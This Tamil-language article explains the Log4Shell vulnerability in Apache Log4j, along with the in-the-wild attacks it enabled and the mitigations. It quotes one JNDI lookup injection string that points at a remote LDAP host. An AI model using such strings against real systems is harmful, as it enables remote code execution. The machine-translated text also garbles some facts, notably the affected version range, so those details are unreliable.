பொருளடக்கம்[மறை][காட்டு]
நவம்பர் 2021 இன் பிற்பகுதியில், இணையப் பாதுகாப்பிற்கு ஒரு பெரிய அச்சுறுத்தலைக் கண்டுபிடித்தோம். இந்தச் சுரண்டல் உலகெங்கிலும் உள்ள மில்லியன் கணக்கான கணினி அமைப்புகளை பாதிக்கும்.
இது Log4j பாதிப்பு மற்றும் உலகின் 90% கணினிச் சேவைகளை எவ்வாறு கவனிக்காமல் விட்டுவிட்டது என்பது பற்றிய வழிகாட்டியாகும்.
Apache Log4j என்பது அப்பாச்சி மென்பொருள் அறக்கட்டளையால் உருவாக்கப்பட்ட ஒரு திறந்த மூல ஜாவா அடிப்படையிலான பதிவு பயன்பாடு ஆகும். முதலில் Ceki Gülcü என்பவரால் 2001 இல் எழுதப்பட்டது, இது இப்போது Apache மென்பொருள் அறக்கட்டளையின் திட்டமான Apache Logging Services இன் ஒரு பகுதியாகும்.
உலகெங்கிலும் உள்ள நிறுவனங்கள் தங்கள் பயன்பாடுகளில் உள்நுழைவதை இயக்க Log4j நூலகத்தைப் பயன்படுத்துகின்றன. உண்மையில், ஜாவா நூலகம் எங்கும் உள்ளது, நீங்கள் அதை Amazon, Microsoft, Google மற்றும் பலவற்றின் பயன்பாடுகளில் காணலாம்.
நூலகத்தின் முக்கியத்துவம் என்னவென்றால், குறியீட்டில் ஏதேனும் குறைபாடு இருந்தால் மில்லியன் கணக்கான கணினிகளை ஹேக்கிங்கிற்குத் திறந்து விடலாம். நவம்பர் 24, 2021 அன்று, ஏ மேகக்கணி பாதுகாப்பு அலிபாபாவில் பணிபுரியும் ஆராய்ச்சியாளர் ஒரு பயங்கரமான குறைபாட்டைக் கண்டுபிடித்தார்.
Log4j பாதிப்பு, Log4Shell என்றும் அழைக்கப்படுகிறது, இது 2013 முதல் கவனிக்கப்படாமல் உள்ளது. இந்த பாதிப்பு Log4j இயங்கும் பாதிக்கப்பட்ட கணினிகளில் குறியீட்டை இயக்க தீங்கிழைக்கும் நடிகர்களை அனுமதித்தது. இது டிசம்பர் 9, 2021 அன்று பகிரங்கமாக வெளியிடப்பட்டது
தொழில் வல்லுநர்கள் Log4Shell குறைபாட்டை அழைக்கின்றனர் சமீபத்திய நினைவகத்தில் மிகப்பெரிய பாதிப்பு.
பாதிப்பு வெளியிடப்பட்ட அடுத்த வாரத்தில், இணைய பாதுகாப்பு குழுக்கள் மில்லியன் கணக்கான தாக்குதல்களைக் கண்டறிந்தன. சில ஆராய்ச்சியாளர்கள் ஒரு நிமிடத்திற்கு நூற்றுக்கும் மேற்பட்ட தாக்குதல்களின் வீதத்தைக் கூட கவனித்தனர்.
இது எப்படி வேலை செய்கிறது?
Log4Shell ஏன் மிகவும் ஆபத்தானது என்பதைப் புரிந்து கொள்ள, அதன் திறன் என்ன என்பதை நாம் புரிந்து கொள்ள வேண்டும்.
Log4Shell பாதிப்பு தன்னிச்சையான குறியீடு செயல்படுத்தலை அனுமதிக்கிறது, இதன் அடிப்படையில் தாக்குபவர் ஒரு இலக்கு கணினியில் எந்த கட்டளை அல்லது குறியீட்டையும் இயக்க முடியும்.
இதை எப்படி நிறைவேற்றுகிறது?
முதலில், JNDI என்றால் என்ன என்பதை நாம் புரிந்து கொள்ள வேண்டும்.
ஜாவா பெயரிடுதல் மற்றும் அடைவு இடைமுகம் (JNDI) என்பது ஒரு ஜாவா சேவையாகும், இது ஜாவா நிரல்களை ஒரு பெயரின் மூலம் தரவு மற்றும் ஆதாரங்களைக் கண்டறிய அனுமதிக்கிறது. இந்த டைரக்டரி சேவைகள் முக்கியமானவை, ஏனெனில் அவை டெவலப்பர்கள் பயன்பாடுகளை உருவாக்கும் போது எளிதாகக் குறிப்பிடுவதற்கு ஒழுங்கமைக்கப்பட்ட பதிவுகளை வழங்குகின்றன.
ஒரு குறிப்பிட்ட கோப்பகத்தை அணுக JNDI பல்வேறு நெறிமுறைகளைப் பயன்படுத்தலாம். இந்த நெறிமுறைகளில் ஒன்று லைட்வெயிட் டைரக்டரி அணுகல் நெறிமுறை அல்லது LDAP ஆகும்.
ஒரு சரத்தை பதிவு செய்யும் போது, பதிவு4j படிவத்தின் வெளிப்பாடுகளை சந்திக்கும் போது சரம் மாற்றீடுகளை செய்கிறது ${prefix:name}
.
உதாரணமாக, Text: ${java:version}
உரையாக உள்நுழைந்திருக்கலாம்: ஜாவா பதிப்பு 1.8.0_65. இந்த வகையான மாற்றீடுகள் பொதுவானவை.
போன்ற வெளிப்பாடுகளையும் நாம் கொண்டிருக்கலாம் Text: ${jndi:ldap://example.com/file}
LDAP நெறிமுறை மூலம் URL இலிருந்து ஜாவா பொருளை ஏற்றுவதற்கு JNDI அமைப்பைப் பயன்படுத்துகிறது.
இது அந்த URL இலிருந்து வரும் தரவை கணினியில் திறம்பட ஏற்றுகிறது. எந்தவொரு சாத்தியமான ஹேக்கரும் பொது URL இல் தீங்கிழைக்கும் குறியீட்டை ஹோஸ்ட் செய்யலாம் மற்றும் Log4j ஐப் பயன்படுத்தும் இயந்திரங்கள் அதை உள்நுழைய காத்திருக்கலாம்.
பதிவு செய்திகளின் உள்ளடக்கங்கள் பயனர் கட்டுப்பாட்டில் உள்ள தரவைக் கொண்டிருப்பதால், ஹேக்கர்கள் தாங்கள் கட்டுப்படுத்தும் LDAP சேவையகங்களைச் சுட்டிக்காட்டும் தங்கள் சொந்த JNDI குறிப்புகளைச் செருகலாம். இந்த LDAP சேவையகங்கள் தீங்கிழைக்கும் ஜாவா பொருட்களால் நிரம்பியிருக்கலாம், அவை பாதிப்பின் மூலம் JNDI செயல்படுத்த முடியும்.
இதை மோசமாக்குவது என்னவென்றால், பயன்பாடு சர்வர் பக்கமாக இருந்தாலும் அல்லது கிளையன்ட் பக்கமாக இருந்தாலும் பரவாயில்லை.
தாக்குபவர்களின் தீங்கிழைக்கும் குறியீட்டைப் படிக்க லாக்கருக்கு ஒரு வழி இருக்கும் வரை, பயன்பாடு இன்னும் சுரண்டலுக்குத் திறந்திருக்கும்.
யார் பாதிக்கப்பட்டுள்ளனர்?
4 வரையிலான பதிப்புகள் 2.0 மற்றும் APache Log2.14.1j ஐப் பயன்படுத்தும் அனைத்து அமைப்புகளையும் சேவைகளையும் பாதிப்பு பாதிக்கிறது.
பல பாதுகாப்பு வல்லுநர்கள், இந்த பாதிப்பு ஜாவாவைப் பயன்படுத்தும் பல பயன்பாடுகளை பாதிக்கலாம் என்று ஆலோசனை கூறுகிறார்கள்.
மைக்ரோசாப்ட் நிறுவனத்திற்குச் சொந்தமான Minecraft வீடியோ கேமில்தான் இந்தக் குறைபாடு முதலில் கண்டுபிடிக்கப்பட்டது. மைக்ரோசாப்ட் தங்கள் பயனர்களை தங்கள் ஜாவா பதிப்பான Minecraft மென்பொருளை மேம்படுத்துமாறு வலியுறுத்தியுள்ளது.
சைபர் செக்யூரிட்டி மற்றும் இன்ஃப்ராஸ்ட்ரக்சர் செக்யூரிட்டி ஏஜென்சியின் (சிஐஎஸ்ஏ) இயக்குனர் ஜென் ஈஸ்டர்லி கூறுகையில், விற்பனையாளர்கள் முக்கிய பொறுப்பு தீங்கிழைக்கும் நடிகர்கள் இந்த பாதிப்பை பயன்படுத்திக் கொள்ளும் இறுதி பயனர்களைத் தடுக்க.
"விற்பனையாளர்கள் தங்கள் வாடிக்கையாளர்களுடன் தொடர்பு கொண்டு, இறுதிப் பயனர்கள் தங்கள் தயாரிப்பு இந்த பாதிப்பைக் கொண்டுள்ளது என்பதை உறுதிப்படுத்திக் கொள்ள வேண்டும் மற்றும் மென்பொருள் புதுப்பிப்புகளுக்கு முன்னுரிமை அளிக்க வேண்டும்."
தாக்குதல்கள் ஏற்கனவே தொடங்கிவிட்டதாக கூறப்படுகிறது. சைபர் செக்யூரிட்டி மென்பொருளை வழங்கும் நிறுவனமான சைமென்டெக், பல்வேறு தாக்குதல் கோரிக்கைகளை அவதானித்துள்ளது.
ஆராய்ச்சியாளர்கள் கண்டறிந்த தாக்குதல்களின் சில எடுத்துக்காட்டுகள் இங்கே:
- பாட்னெட்கள்
பாட்நெட்டுகள் என்பது ஒரு ஒற்றை தாக்குதலின் கட்டுப்பாட்டில் இருக்கும் கணினிகளின் வலையமைப்பு ஆகும். அவை DDoS தாக்குதல்கள், தரவுகளைத் திருடுதல் மற்றும் பிற மோசடிகளைச் செய்ய உதவுகின்றன. Log4j சுரண்டலில் இருந்து பதிவிறக்கம் செய்யப்பட்ட ஷெல் ஸ்கிரிப்ட்களில் Muhstik பாட்நெட்டை ஆராய்ச்சியாளர்கள் கவனித்தனர்.
- XMRig மைனர் ட்ரோஜன்
XMRig என்பது ஒரு திறந்த மூல கிரிப்டோகரன்சி மைனர் ஆகும், இது Monero டோக்கனைச் சுரங்கப்படுத்த CPUகளைப் பயன்படுத்துகிறது. சைபர் கிரைமினல்கள் XMRig ஐ மக்களின் சாதனங்களில் நிறுவ முடியும், அதனால் அவர்கள் அறியாமலேயே அவர்களின் செயலாக்க சக்தியைப் பயன்படுத்தலாம்.
- கோன்சாரி ரான்சம்வேர்
Ransomware என்பது தீம்பொருளின் வடிவத்தைக் குறிக்கிறது கோப்புகளை குறியாக்க ஒரு கணினியில். என்க்ரிப்ட் செய்யப்பட்ட கோப்புகளுக்கு மீண்டும் அணுகலை வழங்குவதற்கு ஈடாக தாக்குபவர்கள் பணம் கோரலாம். Log4Shell தாக்குதல்களில் Khonsari ransomware ஐ ஆராய்ச்சியாளர்கள் கண்டுபிடித்தனர். அவர்கள் விண்டோஸ் சர்வர்களை குறிவைத்து .NET கட்டமைப்பைப் பயன்படுத்துகின்றனர்.
அடுத்த என்ன நடக்கிறது?
Log4J பாதிப்பால் ஏற்படும் குழப்பத்தை முழுமையாக சரி செய்ய மாதங்கள் அல்லது வருடங்கள் கூட ஆகலாம் என்று நிபுணர்கள் கணித்துள்ளனர்.
இந்த செயல்முறையானது ஒவ்வொரு பாதிக்கப்பட்ட கணினியையும் ஒரு இணைப்பு பதிப்புடன் புதுப்பிப்பதை உள்ளடக்கியது. இந்த அமைப்புகள் அனைத்தும் இணைக்கப்பட்டிருந்தாலும் கூட, தாக்குதலுக்காக சேவையகங்கள் திறந்திருக்கும் சாளரத்தில் ஹேக்கர்கள் ஏற்கனவே சேர்த்திருக்கக்கூடிய பின்கதவுகளின் அச்சுறுத்தல் இன்னும் உள்ளது.
நிறைய தீர்வுகள் மற்றும் தணிப்புகள் இந்த பிழையால் பயன்பாடுகள் பயன்படுத்தப்படுவதை தடுக்க உள்ளது. புதிய Log4j பதிப்பு 2.15.0-rc1 இந்த பாதிப்பைக் குறைக்க பல்வேறு அமைப்புகளை மாற்றியுள்ளது.
JNDI ஐப் பயன்படுத்தும் அனைத்து அம்சங்களும் இயல்பாகவே முடக்கப்படும் மற்றும் தொலைநிலைத் தேடல்களும் தடைசெய்யப்பட்டுள்ளன. உங்கள் Log4j அமைப்பில் தேடுதல் அம்சத்தை முடக்குவது சாத்தியமான சுரண்டல்களின் அபாயத்தைக் குறைக்க உதவும்.
Log4j க்கு வெளியே, திறந்த மூல சுரண்டல்களைத் தடுக்க இன்னும் ஒரு பரந்த திட்டத்தின் தேவை உள்ளது.
முன்னதாக மே மாதம் வெள்ளை மாளிகை வெளியிட்டது நிறைவேற்று உத்தரவு இது தேசிய இணைய பாதுகாப்பை மேம்படுத்துவதை நோக்கமாகக் கொண்டது. இது ஒரு சாஃப்ட்வேர் பில் ஆஃப் மெட்டீரியல் (SBOM)க்கான ஒரு ஏற்பாட்டை உள்ளடக்கியது, இது அடிப்படையில் ஒரு முறையான ஆவணமாகும், அதில் பயன்பாட்டை உருவாக்க தேவையான ஒவ்வொரு பொருளின் பட்டியலையும் கொண்டுள்ளது.
போன்ற பகுதிகள் இதில் அடங்கும் திறந்த மூல பேக்கேஜ்கள், சார்புகள் மற்றும் APIகள் மேம்பாட்டிற்காகப் பயன்படுத்தப்படுகின்றன. SBOMகளின் யோசனை வெளிப்படைத்தன்மைக்கு உதவியாக இருந்தாலும், அது உண்மையில் நுகர்வோருக்கு உதவுமா?
சார்புகளை மேம்படுத்துவது மிகவும் சிரமமாக இருக்கலாம். மாற்றுப் பொதிகளைக் கண்டுபிடிப்பதில் கூடுதல் நேரத்தை வீணடிக்கும் அபாயத்தை விட நிறுவனங்கள் ஏதேனும் அபராதம் செலுத்தத் தேர்வு செய்யலாம். ஒருவேளை இந்த SBOMகள் இருந்தால் மட்டுமே பயனுள்ளதாக இருக்கும் நோக்கம் மேலும் வரையறுக்கப்பட்டுள்ளது.
தீர்மானம்
Log4j சிக்கல் நிறுவனங்களுக்கு ஒரு தொழில்நுட்ப சிக்கலை விட அதிகம்.
வணிகத் தலைவர்கள் தங்கள் சேவையகங்கள், தயாரிப்புகள் அல்லது சேவைகள் தாங்களே பராமரிக்காத குறியீட்டை நம்பியிருக்கும் போது ஏற்படக்கூடிய அபாயங்கள் பற்றி அறிந்திருக்க வேண்டும்.
ஓப்பன் சோர்ஸ் மற்றும் மூன்றாம் தரப்பு பயன்பாடுகளை நம்புவது எப்போதுமே சில ஆபத்துகளுடன் வருகிறது. புதிய அச்சுறுத்தல்கள் வெளிச்சத்திற்கு வருவதற்கு முன், இடர் குறைப்பு உத்திகளை உருவாக்குவதை நிறுவனங்கள் பரிசீலிக்க வேண்டும்.
உலகெங்கிலும் உள்ள ஆயிரக்கணக்கான தன்னார்வலர்களால் பராமரிக்கப்படும் திறந்த மூல மென்பொருளை இணையத்தின் பெரும்பகுதி நம்பியுள்ளது.
நாம் வலையை பாதுகாப்பான இடமாக வைத்திருக்க விரும்பினால், திறந்த மூல முயற்சிகள் மற்றும் சைபர் செக்யூரிட்டி ஏஜென்சிகளுக்கு நிதியளிப்பதில் அரசாங்கங்களும் பெருநிறுவனங்களும் முதலீடு செய்ய வேண்டும். சிசா.
ஒரு பதில் விடவும்